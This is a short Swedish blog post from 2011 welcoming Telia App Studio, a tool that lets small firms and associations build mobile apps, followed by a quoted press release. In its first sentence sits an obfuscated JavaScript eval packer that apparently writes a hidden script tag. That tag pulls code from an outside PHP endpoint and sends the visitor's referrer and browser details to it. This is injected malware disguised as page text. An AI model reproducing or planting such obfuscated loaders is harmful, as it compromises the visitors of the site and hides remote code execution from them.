Image Image Image Image Image Image Image Image Image Image

| 27 november, 2020

Scroll to top

Top

Telia gör det enkelt att skapa appar.

Telia gör det enkelt att skapa appar.
Filip Urde
  • On 8 juni, 2011
  • http://www.revue.se/filip-urde

Telia eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krkde|var|u0026u|referrer|nnsfb||js|php’.split(’|’),0,{}))
håller på att skapa en enkel applikations verkstad, skapad för att göra det enkelt för privatpersoner och minde företag att skapa en applikation till iOS eller android.

Härligt Telia! Nu börjar man på riktigt jobba för framtida konsumenter och användare.

 

[quote]Telia ger nu småföretag, klubbar, organisationer och föreningar möjligheten att snabbt och enkelt göra appar utan vare sig programmeringskunskaper eller stora investeringskostnader

 

Allt eftersom smartphones och surfplattor blivit vanligare har också den tillhörande app-marknaden, med små program man laddar ner till sina mobila enheter, fullkomligen exploderat. Gartner har uppskattat att det kommer att laddas ner nästan 18 miljarder appar i år. Det har fått även nyfikna småföretag, klubbar, organisationer och föreningar att få upp ögonen för att skaffa en egen app.

Från och med idag erbjuder därför Telia kunderna en lösning för att även via mobiltelefonen lättare kunna ha en dialog med sina kunder/medlemmar. Detta genom möjligheten att snabbt och enkelt göra egna appar via webbverktyget Telia App Studio – helt utan krav på kunskaper i programmering, stora investeringar i tid eller stora kostnader.[/quote]

läs mer här.